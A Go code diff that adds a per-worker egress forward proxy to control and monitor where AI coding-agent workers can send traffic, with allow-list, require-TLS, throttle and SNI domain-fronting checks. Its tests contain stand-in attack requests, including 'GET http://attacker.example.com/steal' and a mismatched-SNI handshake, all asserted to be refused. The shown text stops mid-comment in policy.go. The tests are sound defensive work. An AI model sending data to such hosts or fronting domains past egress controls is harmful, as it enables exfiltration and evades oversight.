+// splitHostPortLoose splits an authority into host and port, tolerating a
+// missing port (returns host, "").
+func splitHostPortLoose(authority string) (string, string) {
+	host, port, err := net.SplitHostPort(authority)
+	if err != nil {
+		return authority, ""
+	}
+	return host, port
+}
+
+// hostOnly returns the host of an authority, dropping any port.
+func hostOnly(authority string) string {
+	host, _ := splitHostPortLoose(authority)
+	return host
+}
+
+func nonZeroDuration(v, fallback time.Duration) time.Duration {
+	if v > 0 {
+		return v
+	}
+	return fallback
+}

--- a/services/langyagent/adapters/egress/adapter_test.go
+++ b/services/langyagent/adapters/egress/adapter_test.go
@@ -1,0 +1,514 @@
+package egress
+
+import (
+	"bytes"
+	"context"
+	"crypto/tls"
+	"fmt"
+	"net"
+	"strconv"
+	"strings"
+	"sync"
+	"testing"
+	"time"
+
+	"go.uber.org/zap"
+)
+
+// These tests are the executable acceptance bar for
+// specs/langy/langy-egress-enforcement.feature (ADR-043). They exercise the
+// adapter's decision pipeline end-to-end (a real CONNECT over a loopback
+// socket), not string assertions: a denied destination must never be dialed,
+// a cleartext forward must be refused, a listed host must tunnel, and the
+// per-destination throttle must slow one host without slowing another.
+
+// waitForListenerOrFail blocks until the adapter's loopback port accepts a
+// connection, so a test never races the serve goroutine's bind.
+func waitForListenerOrFail(t *testing.T, port int) {
+	t.Helper()
+	deadline := time.Now().Add(2 * time.Second)
+	for time.Now().Before(deadline) {
+		conn, err := net.DialTimeout("tcp", fmt.Sprintf("127.0.0.1:%d", port), 50*time.Millisecond)
+		if err == nil {
+			_ = conn.Close()
+			return
+		}
+		time.Sleep(20 * time.Millisecond)
+	}
+	t.Fatalf("egress adapter did not bind 127.0.0.1:%d in time", port)
+}
+
+// recordingMonitor captures every flagged decision so a test can assert that
+// enforcement is ALSO monitored (rung 0).
+type recordingMonitor struct {
+	mu     sync.Mutex
+	events []egressEvent
+}
+
+func (m *recordingMonitor) record(e egressEvent) {
+	m.mu.Lock()
+	m.events = append(m.events, e)
+	m.mu.Unlock()
+}
+
+func (m *recordingMonitor) decisions() []egressDecision {
+	m.mu.Lock()
+	defer m.mu.Unlock()
+	out := make([]egressDecision, 0, len(m.events))
+	for _, e := range m.events {
+		out = append(out, e.Decision)
+	}
+	return out
+}
+
+func (m *recordingMonitor) has(d egressDecision) bool {
+	for _, got := range m.decisions() {
+		if got == d {
+			return true
+		}
+	}
+	return false
+}
+
+// echoUpstream is a stand-in destination that echoes whatever it receives, so
+// an established tunnel is observable end-to-end.
+type echoUpstream struct {
+	ln       net.Listener
+	accepted int32
+	mu       sync.Mutex
+}
+
+func startEchoUpstream(t *testing.T) *echoUpstream {
+	t.Helper()
+	ln, err := net.Listen("tcp", "127.0.0.1:0")
+	if err != nil {
+		t.Fatalf("echo listen: %v", err)
+	}
+	e := &echoUpstream{ln: ln}
+	go func() {
+		for {
+			conn, err := ln.Accept()
+			if err != nil {
+				return
+			}
+			e.mu.Lock()
+			e.accepted++
+			e.mu.Unlock()
+			go func(c net.Conn) {
+				defer c.Close()
+				buf := make([]byte, 4096)
+				for {
+					n, err := c.Read(buf)
+					if n > 0 {
+						_, _ = c.Write(buf[:n])
+					}
+					if err != nil {
+						return
+					}
+				}
+			}(conn)
+		}
+	}()
+	t.Cleanup(func() { _ = ln.Close() })
+	return e
+}
+
+func (e *echoUpstream) accepts() int32 {
+	e.mu.Lock()
+	defer e.mu.Unlock()
+	return e.accepted
+}
+
+// dialRecorder wraps a dial func to (a) record which authorities were dialed
+// and (b) route every dial to the echo upstream regardless of the requested
+// host, so realistic FQDNs can be used while everything lands on loopback.
+type dialRecorder struct {
+	echoAddr string
+	mu       sync.Mutex
+	dialed   []string
+}
+
+func (d *dialRecorder) dial(ctx context.Context, network, addr string) (net.Conn, error) {
+	d.mu.Lock()
+	d.dialed = append(d.dialed, addr)
+	d.mu.Unlock()
+	return net.Dial("tcp", d.echoAddr)
+}
+
+func (d *dialRecorder) dialedAuthority(authority string) bool {
+	d.mu.Lock()
+	defer d.mu.Unlock()
+	for _, a := range d.dialed {
+		if a == authority {
+			return true
+		}
+	}
+	return false
+}
+
+// harness bundles an adapter with its monitor + dial recorder.
+type harness struct {
+	adapter  *egressAdapter
+	monitor  *recordingMonitor
+	dialer   *dialRecorder
+	proxyURL string
+}
+
+func newHarness(t *testing.T, cfg egressAdapterConfig) *harness {
+	t.Helper()
+	echo := startEchoUpstream(t)
+	mon := &recordingMonitor{}
+	dialer := &dialRecorder{echoAddr: echo.ln.Addr().String()}
+	cfg.monitor = mon
+	cfg.dial = dialer.dial
+	cfg.log = zap.NewNop()
+
+	adapter, err := startEgressAdapter(0, cfg)
+	if err != nil {
+		t.Fatalf("startEgressAdapter: %v", err)
+	}
+	t.Cleanup(adapter.shutdown)
+	waitForListenerOrFail(t, adapter.port)
+
+	return &harness{
+		adapter:  adapter,
+		monitor:  mon,
+		dialer:   dialer,
+		proxyURL: fmt.Sprintf("127.0.0.1:%d", adapter.port),
+	}
+}
+
+// sendCONNECT dials the proxy and issues a CONNECT for authority, returning the
+// raw connection (positioned at the tunnel start) and the HTTP status code.
+func (h *harness) sendCONNECT(t *testing.T, authority string) (net.Conn, int) {
+	t.Helper()
+	conn, err := net.Dial("tcp", h.proxyURL)
+	if err != nil {
+		t.Fatalf("dial proxy: %v", err)
+	}
+	_ = conn.SetDeadline(time.Now().Add(3 * time.Second))
+	if _, err := fmt.Fprintf(conn, "CONNECT %s HTTP/1.1\r\nHost: %s\r\n\r\n", authority, authority); err != nil {
+		t.Fatalf("write CONNECT: %v", err)
+	}
+	return conn, readResponseStatus(t, conn)
+}
+
+// readResponseStatus reads bytes up to the header terminator and parses the
+// status code, leaving the connection positioned exactly at the tunnel start
+// (no over-read into tunnel bytes).
+func readResponseStatus(t *testing.T, conn net.Conn) int {
+	t.Helper()
+	var buf []byte
+	one := make([]byte, 1)
+	for {
+		n, err := conn.Read(one)
+		if n > 0 {
+			buf = append(buf, one[0])
+			if bytes.HasSuffix(buf, []byte("\r\n\r\n")) {
+				break
+			}
+		}
+		if err != nil {
+			t.Fatalf("read response head: %v (got %q)", err, buf)
+		}
+	}
+	line := string(buf)
+	fields := strings.SplitN(line, " ", 3)
+	if len(fields) < 2 {
+		t.Fatalf("malformed status line: %q", line)
+	}
+	code, err := strconv.Atoi(fields[1])
+	if err != nil {
+		t.Fatalf("parse status code from %q: %v", line, err)
+	}
+	return code
+}
+
+func baseCfg() egressAdapterConfig {
+	return egressAdapterConfig{
+		conversationID: "conv-egress-test",
+		throttle:       defaultThrottleConfig(),
+		requireTLS:     true,
+		sniCrossCheck:  false,
+	}
+}
+
+// ---- Rung 2: allow-list set means restrict to it ----
+
+func TestEgress_ListedHostIsAllowedAndTunnels(t *testing.T) {
+	cfg := baseCfg()
+	cfg.policy = egressPolicy{allowlist: []string{"registry.npmjs.org"}}
+	h := newHarness(t, cfg)
+
+	conn, status := h.sendCONNECT(t, "registry.npmjs.org:443")
+	defer conn.Close()
+	if status != 200 {
+		t.Fatalf("listed host got status %d, want 200", status)
+	}
+
+	// The tunnel is real: bytes we write echo back through the upstream.
+	if _, err := conn.Write([]byte("ping")); err != nil {
+		t.Fatalf("tunnel write: %v", err)
+	}
+	got := make([]byte, 4)
+	if _, err := conn.Read(got); err != nil {
+		t.Fatalf("tunnel read: %v", err)
+	}
+	if string(got) != "ping" {
+		t.Fatalf("tunnel echoed %q, want %q", got, "ping")
+	}
+	if !h.dialer.dialedAuthority("registry.npmjs.org:443") {
+		t.Fatalf("expected the listed host to be dialed")
+	}
+	if !h.monitor.has(egressAllowedListed) {
+		t.Fatalf("expected an allowed_listed flag, got %v", h.monitor.decisions())
+	}
+}
+
+func TestEgress_NonListedHostIsDeniedAndNeverDialed(t *testing.T) {
+	cfg := baseCfg()
+	cfg.policy = egressPolicy{allowlist: []string{"registry.npmjs.org"}}
+	h := newHarness(t, cfg)
+
+	conn, status := h.sendCONNECT(t, "attacker.example.com:443")
+	defer conn.Close()
+	if status != 403 {
+		t.Fatalf("non-listed host got status %d, want 403", status)
+	}
+	// The security-critical assertion: the destination is never contacted, so
+	// no bytes could leave the pod toward it.
+	if h.dialer.dialedAuthority("attacker.example.com:443") {
+		t.Fatalf("denied destination was dialed — bytes could have leaked")
+	}
+	if !h.monitor.has(egressDenied) {
+		t.Fatalf("expected a denied flag, got %v", h.monitor.decisions())
+	}
+}
+
+// ---- Rung 2 default: no allow-list means monitor, not block ----
+
+func TestEgress_NoAllowlistAllowsButFlagsMonitorOnly(t *testing.T) {
+	cfg := baseCfg()
+	cfg.policy = egressPolicy{} // no customer list, floor unset, enforceFloor off
+	h := newHarness(t, cfg)
+
+	conn, status := h.sendCONNECT(t, "some-new-host.example:443")
+	defer conn.Close()
+	if status != 200 {
+		t.Fatalf("monitor-only host got status %d, want 200 (nothing blocked)", status)
+	}
+	if !h.dialer.dialedAuthority("some-new-host.example:443") {
+		t.Fatalf("expected the host to be dialed in monitor-only mode")
+	}
+	if !h.monitor.has(egressAllowedMonitor) {
+		t.Fatalf("expected an allowed_monitor flag, got %v", h.monitor.decisions())
+	}
+	if h.monitor.has(egressDenied) {
+		t.Fatalf("monitor-only mode must not deny on allow-list grounds")
+	}
+}
+
+// ---- Rung 3: always-on FQDN floor ----
+
+func TestEgress_FloorHostAllowedEvenUnderRestrictiveList(t *testing.T) {
+	cfg := baseCfg()
+	// Customer restricts to one host; the floor must still let structural
+	// destinations (github) through — floor ∪ list, floor is additive.
+	cfg.policy = egressPolicy{
+		allowlist: []string{"registry.npmjs.org"},
+		floor:     []string{"github.com", "api.github.com"},
+	}
+	h := newHarness(t, cfg)
+
+	conn, status := h.sendCONNECT(t, "api.github.com:443")
+	defer conn.Close()
+	if status != 200 {
+		t.Fatalf("floor host got status %d, want 200", status)
+	}
+	if !h.monitor.has(egressAllowedFloor) {
+		t.Fatalf("expected an allowed_floor flag, got %v", h.monitor.decisions())
+	}
+}
+
+func TestEgress_EmptyListDoesNotWidenOrDenyOutsideFloor(t *testing.T) {
+	cfg := baseCfg()
+	// Floor configured, no customer list, floor NOT enforced (default): a host
+	// outside the floor is allowed (monitor-only), not denied and not
+	// allow-listed.
+	cfg.policy = egressPolicy{floor: []string{"github.com"}, enforceFloor: false}
+	h := newHarness(t, cfg)
+
+	conn, status := h.sendCONNECT(t, "outside-floor.example:443")
+	defer conn.Close()
+	if status != 200 {
+		t.Fatalf("outside-floor host got status %d, want 200 (monitor-only)", status)
+	}
+	if !h.monitor.has(egressAllowedMonitor) {
+		t.Fatalf("expected allowed_monitor, got %v", h.monitor.decisions())
+	}
+}
+
+func TestEgress_EnforceFloorDeniesOutsideFloorWithoutCustomerList(t *testing.T) {
+	cfg := baseCfg()
+	// Operator flips the rung-3 lever: the floor becomes a hard ceiling even
+	// without a customer list.
+	cfg.policy = egressPolicy{floor: []string{"github.com"}, enforceFloor: true}
+	h := newHarness(t, cfg)
+
+	denied, status := h.sendCONNECT(t, "outside-floor.example:443")
+	defer denied.Close()
+	if status != 403 {
+		t.Fatalf("with enforceFloor on, outside-floor host got %d, want 403", status)
+	}
+	if h.dialer.dialedAuthority("outside-floor.example:443") {
+		t.Fatalf("enforced-floor deny must not dial the destination")
+	}
+
+	allowed, status := h.sendCONNECT(t, "github.com:443")
+	defer allowed.Close()
+	if status != 200 {
+		t.Fatalf("floor host under enforceFloor got %d, want 200", status)
+	}
+}
+
+// ---- Rung 1a: require TLS ----
+
+func TestEgress_CleartextForwardIsRefused(t *testing.T) {
+	cfg := baseCfg()
+	cfg.policy = egressPolicy{} // even monitor-only refuses cleartext
+	h := newHarness(t, cfg)
+
+	conn, err := net.Dial("tcp", h.proxyURL)
+	if err != nil {
+		t.Fatalf("dial proxy: %v", err)
+	}
+	defer conn.Close()
+	_ = conn.SetDeadline(time.Now().Add(3 * time.Second))
+	// Absolute-form plain-HTTP proxy request (cleartext), not a CONNECT.
+	if _, err := fmt.Fprintf(conn,
+		"GET http://attacker.example.com/steal HTTP/1.1\r\nHost: attacker.example.com\r\n\r\n"); err != nil {
+		t.Fatalf("write plain request: %v", err)
+	}
+	status := readResponseStatus(t, conn)
+	if status != 403 {
+		t.Fatalf("cleartext forward got status %d, want 403", status)
+	}
+	if h.dialer.dialedAuthority("attacker.example.com:80") {
+		t.Fatalf("cleartext destination must never be dialed")
+	}
+	if !h.monitor.has(egressDeniedCleartext) {
+		t.Fatalf("expected a denied_cleartext flag, got %v", h.monitor.decisions())
+	}
+}
+
+func TestEgress_NonTLSPortIsRefusedWhenRequireTLS(t *testing.T) {
+	cfg := baseCfg()
+	cfg.policy = egressPolicy{allowlist: []string{"registry.npmjs.org"}}
+	h := newHarness(t, cfg)
+
+	conn, status := h.sendCONNECT(t, "registry.npmjs.org:22")
+	defer conn.Close()
+	if status != 403 {
+		t.Fatalf("CONNECT to :22 under require-TLS got %d, want 403", status)
+	}
+}
+
+// ---- Rung 3 cross-check: SNI must match the authorised authority ----
+
+func TestEgress_SNIMismatchIsRefusedBeforeDial(t *testing.T) {
+	cfg := baseCfg()
+	cfg.sniCrossCheck = true
+	// `allowed.example` is on the list; `attacker.example` is not. A client
+	// that CONNECTs to the allowed authority but negotiates TLS with the
+	// attacker SNI (domain-fronting) must be refused, and the destination never
+	// dialed.
+	cfg.policy = egressPolicy{allowlist: []string{"allowed.example"}}
+	h := newHarness(t, cfg)
+
+	conn, status := h.sendCONNECT(t, "allowed.example:443")
+	defer conn.Close()
+	if status != 200 {
+		t.Fatalf("authority passed the list but CONNECT got %d, want 200", status)
+	}
+	// Drive a real ClientHello carrying the mismatched SNI.
+	tlsConn := tls.Client(conn, &tls.Config{
+		ServerName:         "attacker.example",
+		InsecureSkipVerify: true,
+	})
+	_ = conn.SetDeadline(time.Now().Add(3 * time.Second))
+	if err := tlsConn.Handshake(); err == nil {
+		t.Fatalf("handshake unexpectedly succeeded; adapter should have refused the SNI mismatch")
+	}
+	if h.dialer.dialedAuthority("allowed.example:443") {
+		t.Fatalf("SNI mismatch must be refused BEFORE dialing the destination")
+	}
+	if !h.monitor.has(egressDeniedSNIMismatch) {
+		t.Fatalf("expected a denied_sni_mismatch flag, got %v", h.monitor.decisions())
+	}
+}
+
+// ---- Rung 1b: per-destination throttle, keyed per host ----
+
+func TestEgressThrottle_ConnectionBurstTarpitsOneHostOnly(t *testing.T) {
+	cfg := throttleConfig{
+		connWindow:          time.Second,
+		maxConnsPerWindow:   3,
+		tarpitPerExcessConn: 100 * time.Millisecond,
+		maxTarpit:           time.Second,
+		byteBurst:           1 << 20,
+		bytesPerSec:         1 << 20,
+	}
+	th := newEgressThrottle(cfg)
+
+	// First 3 connections to host A are under budget.
+	for i := 0; i < 3; i++ {
+		if d, throttled := th.admitConnection("a.example"); throttled || d != 0 {
+			t.Fatalf("conn %d to A should be under budget, got throttled=%v delay=%v", i, throttled, d)
+		}
+	}
+	// The 4th trips the throttle with a tar-pit delay.
+	d, throttled := th.admitConnection("a.example")
+	if !throttled || d <= 0 {
+		t.Fatalf("burst to A should be throttled, got throttled=%v delay=%v", throttled, d)
+	}
+	// A different host is unaffected — the throttle is per destination.
+	if d, throttled := th.admitConnection("b.example"); throttled || d != 0 {
+		t.Fatalf("host B must not be slowed by host A's burst, got throttled=%v delay=%v", throttled, d)
+	}
+}
+
+func TestEgressThrottle_ByteVolumeThrottlesOneHostNotAnother(t *testing.T) {
+	cfg := throttleConfig{
+		connWindow:        time.Minute,
+		maxConnsPerWindow: 1000,
+		byteBurst:         1 << 10,   // 1 KiB flows free, then the cap engages
+		bytesPerSec:       256 << 10, // fast enough to drain in the test window
+	}
+	th := newEgressThrottle(cfg)
+	limA := th.limiterFor("a.example")
+	limB := th.limiterFor("b.example")
+
+	// Stream well over the burst to host A: the copy must report throttling.
+	payload := bytes.Repeat([]byte("x"), 8<<10) // 8 KiB
+	var sink bytes.Buffer
+	ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
+	defer cancel()
+	_, throttledA, err := throttledCopy(ctx, &sink, bytes.NewReader(payload), limA)
+	if err != nil {
+		t.Fatalf("copy to A: %v", err)
+	}
+	if !throttledA {
+		t.Fatalf("a large volume to A should have been throttled")
+	}
+
+	// A small flow to B stays under B's own burst — not slowed.
+	var sinkB bytes.Buffer
+	small := bytes.Repeat([]byte("y"), 512)
+	_, throttledB, err := throttledCopy(ctx, &sinkB, bytes.NewReader(small), limB)
+	if err != nil {
+		t.Fatalf("copy to B: %v", err)
+	}
+	if throttledB {
+		t.Fatalf("a small flow to B must not be throttled by A's volume")
+	}
+}

--- a/services/langyagent/adapters/egress/egress.go
+++ b/services/langyagent/adapters/egress/egress.go
@@ -1,43 +1,86 @@
-// Package egress is a thin seam for per-worker egress monitoring. It exists so
-// that PR4 (egress monitoring) can slot real behaviour behind the Guard
-// interface without restructuring the worker pool. This PR ships ONLY the
-// interface and a pass-through implementation — no monitoring logic lands here.
+// Package egress is the per-worker egress seam and its implementations. The
+// pool consults a Guard around a worker's lifecycle: PrepareWorker runs before
+// the opencode subprocess starts (it sets up this worker's egress policy and
+// returns the loopback forward-proxy the worker's HTTPS_PROXY must point at, and
+// may fail the spawn closed), and ReleaseWorker runs when the worker is torn
+// down (guard-owned bookkeeping / observation cleanup).
 //
-// The pool consults the Guard around a worker's lifecycle: PrepareWorker runs
-// before the opencode subprocess starts (so an implementation could set up
-// per-worker egress policy / observation, and can fail the spawn closed), and
-// ReleaseWorker runs when the worker is torn down (so an implementation can
-// clean up whatever it set up).
+// Three implementations live here:
+//   - PassThrough: no-op, no proxy — the worker egresses direct, exactly as
+//     before (used in tests / partial wiring).
+//   - MonitoringGuard (monitor.go): ADR-044 observe-only — per-worker spans, no
+//     proxy, never blocks.
+//   - EnforcingGuard (enforcing.go): ADR-043 enforcement — a per-worker outbound
+//     forward proxy (adapter.go) that require-TLS / throttles / applies the
+//     floor ∪ allow-list policy / SNI-cross-checks every CONNECT, monitor-first.
 package egress
 
 import "context"
 
-// WorkerContext is the minimal per-worker identity the guard needs. Kept small
-// on purpose — PR4 widens it if it needs more, without touching the pool.
+// WorkerContext is the per-worker identity + policy inputs the guard needs at
+// spawn. Widened from PR3's {ConversationID, UID} to carry the project's egress
+// allow-list (ADR-043 rung 2) threaded from the credentials envelope.
 type WorkerContext struct {
 	// ConversationID is the per-conversation worker key.
 	ConversationID string
 	// UID is the kernel UID the worker subprocess runs as.
 	UID uint32
+	// EgressAllowlist is the project's per-project Langy egress allow-list
+	// (ADR-043 rung 2). The *presence* of the list is the enforcement mode:
+	// nil/empty ⇒ the guard watches but blocks nothing; non-empty ⇒ the guard
+	// restricts outbound to floor ∪ this list.
+	EgressAllowlist []string
 }
 
-// Guard is the per-worker egress seam. A returned error from PrepareWorker
-// fails the spawn closed (the worker does not start) — matching the platform's
+// WorkerEgress is the per-worker egress handle PrepareWorker returns. It carries
+// the loopback forward-proxy port the worker's HTTPS_PROXY must point at (0 when
+// the guard runs no proxy — pass-through / observe-only, so the worker egresses
+// direct) and a Close that tears the proxy down. The pool stores it on the
+// Worker and Closes it on every teardown path, exactly as it does the authProxy,
+// so a per-worker proxy never outlives its worker (nor leaks across a recycle).
+type WorkerEgress struct {
+	// ProxyPort is the loopback port to inject as HTTPS_PROXY/HTTP_PROXY. Zero
+	// means no per-worker proxy — the worker egresses direct as before.
+	ProxyPort int
+	// closeFn tears down the per-worker proxy. Nil for the no-proxy guards.
+	closeFn func()
+}
+
+// Close tears down the per-worker egress adapter. Idempotent and nil-safe: the
+// no-proxy guards return a zero WorkerEgress whose Close does nothing, and the
+// enforcing guard wraps its shutdown in a sync.Once so kill + exit-watcher can
+// both call it.
+func (e WorkerEgress) Close() {
+	if e.closeFn != nil {
+		e.closeFn()
+	}
+}
+
+// Guard is the per-worker egress seam. A returned error from PrepareWorker fails
+// the spawn closed (the worker does not start) — matching the platform's
 // fail-closed posture for anything security-adjacent.
 type Guard interface {
-	PrepareWorker(ctx context.Context, w WorkerContext) error
+	// PrepareWorker sets up per-worker egress before the subprocess starts and
+	// returns the handle (proxy port + teardown) the pool threads into the
+	// worker env and stores for teardown. An error fails the spawn closed.
+	PrepareWorker(ctx context.Context, w WorkerContext) (WorkerEgress, error)
+	// ReleaseWorker is the guard's own teardown hook (observe-only cleanup). The
+	// per-worker proxy is torn down via WorkerEgress.Close, not here.
 	ReleaseWorker(ctx context.Context, conversationID string)
 }
 
-// PassThrough is the default Guard: it does nothing and changes no behaviour.
-// PR4 replaces it with a real implementation.
+// PassThrough is the no-op Guard: it runs no proxy and changes no behaviour —
+// the worker egresses direct, exactly as before. Used in tests and partial
+// wiring.
 type PassThrough struct{}
 
 // NewPassThrough returns the no-op guard.
 func NewPassThrough() PassThrough { return PassThrough{} }
 
-// PrepareWorker is a no-op; the worker starts unmonitored, exactly as before.
-func (PassThrough) PrepareWorker(_ context.Context, _ WorkerContext) error { return nil }
+// PrepareWorker is a no-op; the worker starts with no proxy (ProxyPort 0).
+func (PassThrough) PrepareWorker(_ context.Context, _ WorkerContext) (WorkerEgress, error) {
+	return WorkerEgress{}, nil
+}
 
 // ReleaseWorker is a no-op.
 func (PassThrough) ReleaseWorker(_ context.Context, _ string) {}

--- a/services/langyagent/adapters/egress/egress_test.go
+++ b/services/langyagent/adapters/egress/egress_test.go
@@ -7,10 +7,15 @@ import (
 
 func TestPassThrough_PrepareWorkerIsNoOp(t *testing.T) {
 	g := NewPassThrough()
-	if err := g.PrepareWorker(context.Background(), WorkerContext{ConversationID: "c", UID: 2000}); err != nil {
+	we, err := g.PrepareWorker(context.Background(), WorkerContext{ConversationID: "c", UID: 2000})
+	if err != nil {
 		t.Fatalf("pass-through PrepareWorker must never error, got %v", err)
 	}
-	// ReleaseWorker must not panic.
+	if we.ProxyPort != 0 {
+		t.Fatalf("pass-through must run no proxy, got ProxyPort=%d", we.ProxyPort)
+	}
+	// Close + ReleaseWorker must not panic.
+	we.Close()
 	g.ReleaseWorker(context.Background(), "c")
 }
 

--- a/services/langyagent/adapters/egress/enforcing.go
+++ b/services/langyagent/adapters/egress/enforcing.go
@@ -1,0 +1,86 @@
+package egress
+
+import (
+	"context"
+	"sync"
+
+	"go.uber.org/zap"
+)
+
+// EnforcingConfig is the operator-owned egress posture (ADR-043), resolved once
+// from the manager config and shared by every worker. The per-project customer
+// allow-list is NOT here — it rides each worker's credentials envelope and
+// arrives via WorkerContext.EgressAllowlist.
+type EnforcingConfig struct {
+	// Floor is the always-allowed structural set (github / gateway / control
+	// plane). Additive to each project's customer allow-list; never a ceiling by
+	// itself unless EnforceFloor is on.
+	Floor []string
+	// RequireTLS refuses cleartext forwards and non-:443 CONNECTs (rung 1a).
+	RequireTLS bool
+	// EnforceFloor makes the floor a hard ceiling for projects that set no
+	// allow-list (rung 3 lever). Off by default keeps the stock posture
+	// monitor-only.
+	EnforceFloor bool
+	// SNICrossCheck peeks the TLS ClientHello SNI as an anti-domain-fronting
+	// cross-check of the CONNECT authority.
+	SNICrossCheck bool
+	// Logger is the pod logger the default rung-0 monitor writes decisions to.
+	Logger *zap.Logger
+}
+
+// EnforcingGuard is the ADR-043 enforcement Guard. PrepareWorker stands up a
+// per-worker outbound forward proxy (egressAdapter) bound to an ephemeral
+// loopback port and returns that port so the pool points the worker's
+// HTTPS_PROXY at it; the proxy enforces require-TLS / throttle / floor ∪
+// allow-list / SNI-cross-check on every CONNECT, monitor-first. The guard is
+// stateless per worker — teardown rides on the returned WorkerEgress handle
+// (stored on the Worker, Closed on every teardown path), so a recycle can never
+// leave a stale proxy bound to a conversation's port.
+type EnforcingGuard struct {
+	cfg EnforcingConfig
+	log *zap.Logger
+}
+
+// NewEnforcingGuard builds the enforcement guard from the operator config.
+func NewEnforcingGuard(cfg EnforcingConfig) *EnforcingGuard {
+	log := cfg.Logger
+	if log == nil {
+		log = zap.NewNop()
+	}
+	return &EnforcingGuard{cfg: cfg, log: log}
+}
+
+// PrepareWorker binds this worker's forward proxy and returns its loopback port.
+// A bind failure fails the spawn closed (a worker that cannot get its enforced
+// egress path must not start with unenforced egress).
+func (g *EnforcingGuard) PrepareWorker(_ context.Context, w WorkerContext) (WorkerEgress, error) {
+	adapter, err := startEgressAdapter(0, egressAdapterConfig{
+		conversationID: w.ConversationID,
+		policy: egressPolicy{
+			allowlist:    w.EgressAllowlist,
+			floor:        g.cfg.Floor,
+			enforceFloor: g.cfg.EnforceFloor,
+		},
+		throttle:      defaultThrottleConfig(),
+		requireTLS:    g.cfg.RequireTLS,
+		sniCrossCheck: g.cfg.SNICrossCheck,
+		log:           g.log,
+	})
+	if err != nil {
+		return WorkerEgress{}, err
+	}
+	var once sync.Once
+	return WorkerEgress{
+		ProxyPort: adapter.port,
+		closeFn:   func() { once.Do(adapter.shutdown) },
+	}, nil
+}
+
+// ReleaseWorker is a no-op: the per-worker proxy is torn down via the returned
+// WorkerEgress.Close (stored on the Worker), not from conversation-keyed guard
+// state, so a kill-then-respawn on the same conversation cannot close the
+// replacement's proxy.
+func (g *EnforcingGuard) ReleaseWorker(_ context.Context, _ string) {}
+
+var _ Guard = (*EnforcingGuard)(nil)

--- a/services/langyagent/adapters/egress/event.go
+++ b/services/langyagent/adapters/egress/event.go
@@ -1,0 +1,90 @@
+package egress
+
+import "go.uber.org/zap"
+
+// egressDecision is the verb attached to every observed outbound flow. Rung 0
+// (ADR-043) makes every enforcement action ALSO a monitored event, so a
+// deny/throttle is a monitored deny/throttle — the same event with a different
+// verb. The control plane never sees these; they are pod-local telemetry.
+type egressDecision string
+
+const (
+	// egressAllowedFloor: destination is on the always-on operator FQDN floor
+	// (github / gateway / control plane). Allowed regardless of customer list.
+	egressAllowedFloor egressDecision = "allowed_floor"
+	// egressAllowedMonitor: no customer allow-list is set and the floor is not
+	// enforced, so the flow is allowed but flagged (rung 2 default — watch, do
+	// not block).
+	egressAllowedMonitor egressDecision = "allowed_monitor"
+	// egressAllowedListed: destination is on the customer's allow-list.
+	egressAllowedListed egressDecision = "allowed_listed"
+	// egressThrottled: destination was allowed but the flow shape (connection
+	// burst or byte volume) tripped the per-destination soft throttle.
+	egressThrottled egressDecision = "throttled"
+	// egressDenied: an allow-list is in force and the destination is not on it
+	// (nor on the floor). Bytes never leave the pod.
+	egressDenied egressDecision = "denied"
+	// egressDeniedCleartext: a cleartext (non-CONNECT / non-TLS) forward to an
+	// external host — refused by rung 1a require-TLS.
+	egressDeniedCleartext egressDecision = "denied_cleartext"
+	// egressDeniedSNIMismatch: the TLS ClientHello SNI did not match the CONNECT
+	// authority the decision was made against (domain-fronting attempt).
+	egressDeniedSNIMismatch egressDecision = "denied_sni_mismatch"
+)
+
+// blocked reports whether a decision denied the flow (no bytes reach the
+// destination). Used at the call site to choose 403 vs. tunnel.
+func (d egressDecision) blocked() bool {
+	switch d {
+	case egressDenied, egressDeniedCleartext, egressDeniedSNIMismatch:
+		return true
+	default:
+		return false
+	}
+}
+
+// egressEvent is one observed outbound flow, attributed to the worker's
+// conversation. Bytes is populated on flow completion for allowed tunnels.
+type egressEvent struct {
+	ConversationID string
+	Host           string
+	Port           string
+	Decision       egressDecision
+	Reason         string
+	Bytes          int64
+}
+
+// egressMonitor is the rung-0 flag sink (ADR-043). The enforcing adapter calls
+// record() on every per-CONNECT decision so enforcement and monitoring are the
+// same event. The default is logEgressMonitor (pod log); an operator wiring a
+// richer attributed-telemetry sink injects it at NewEnforcingGuard time. This is
+// a distinct surface from the ADR-044 MonitoringGuard/InstrumentedRoundTripper,
+// which observes the MANAGER's own outbound transport rather than per-worker
+// forward-proxy flows.
+type egressMonitor interface {
+	record(egressEvent)
+}
+
+// logEgressMonitor is the default monitor: it emits every decision to the pod
+// log, so "every enforcement action is a monitored event" holds out of the box.
+type logEgressMonitor struct {
+	log *zap.Logger
+}
+
+func newLogEgressMonitor(log *zap.Logger) *logEgressMonitor {
+	return &logEgressMonitor{log: log}
+}
+
+func (m *logEgressMonitor) record(e egressEvent) {
+	if m == nil || m.log == nil {
+		return
+	}
+	m.log.Info("langy egress",
+		zap.String("conversation", e.ConversationID),
+		zap.String("host", e.Host),
+		zap.String("port", e.Port),
+		zap.String("decision", string(e.Decision)),
+		zap.String("reason", e.Reason),
+		zap.Int64("bytes", e.Bytes),
+	)
+}

--- a/services/langyagent/adapters/egress/monitor.go
+++ b/services/langyagent/adapters/egress/monitor.go
@@ -171,9 +171,9 @@ func NewMonitoringGuard(cfg Config) *MonitoringGuard {
 	return &MonitoringGuard{cfg: cfg, tracer: otel.Tracer(instrumentationName)}
 }
 
-// PrepareWorker records the worker starting. Observe-only: returns nil so the
-// spawn is never failed closed in PR3.
-func (g *MonitoringGuard) PrepareWorker(ctx context.Context, w WorkerContext) error {
+// PrepareWorker records the worker starting. Observe-only: it runs no proxy
+// (returns a zero WorkerEgress) and never fails the spawn closed.
+func (g *MonitoringGuard) PrepareWorker(ctx context.Context, w WorkerContext) (WorkerEgress, error) {
 	_, span := g.tracer.Start(ctx, "langy.egress.worker.prepare",
 		trace.WithAttributes(
 			attribute.String("langy.conversation.id", w.ConversationID),
@@ -181,7 +181,7 @@ func (g *MonitoringGuard) PrepareWorker(ctx context.Context, w WorkerContext) er
 		),
 	)
 	span.End()
-	return nil
+	return WorkerEgress{}, nil
 }
 
 // ReleaseWorker records the worker being torn down.

--- a/services/langyagent/adapters/egress/policy.go
+++ b/services/langyagent/adapters/egress/policy.go
@@ -1,0 +1,94 @@
+package egress
+
+import "strings"
+
+// egressPolicy is the per-worker allow decision (ADR-043 rungs 2 and 3). It is
+// constructed at worker spawn from that worker's credentials envelope
+// (customer allowlist) plus the operator floor, and never mutated afterwards —
+// a policy change recycles the worker (see domain.SignatureOf).
+//
+// Decision precedence, given a destination FQDN:
+//
+//  1. floor      → allow (the always-on structural set; allowed even when a
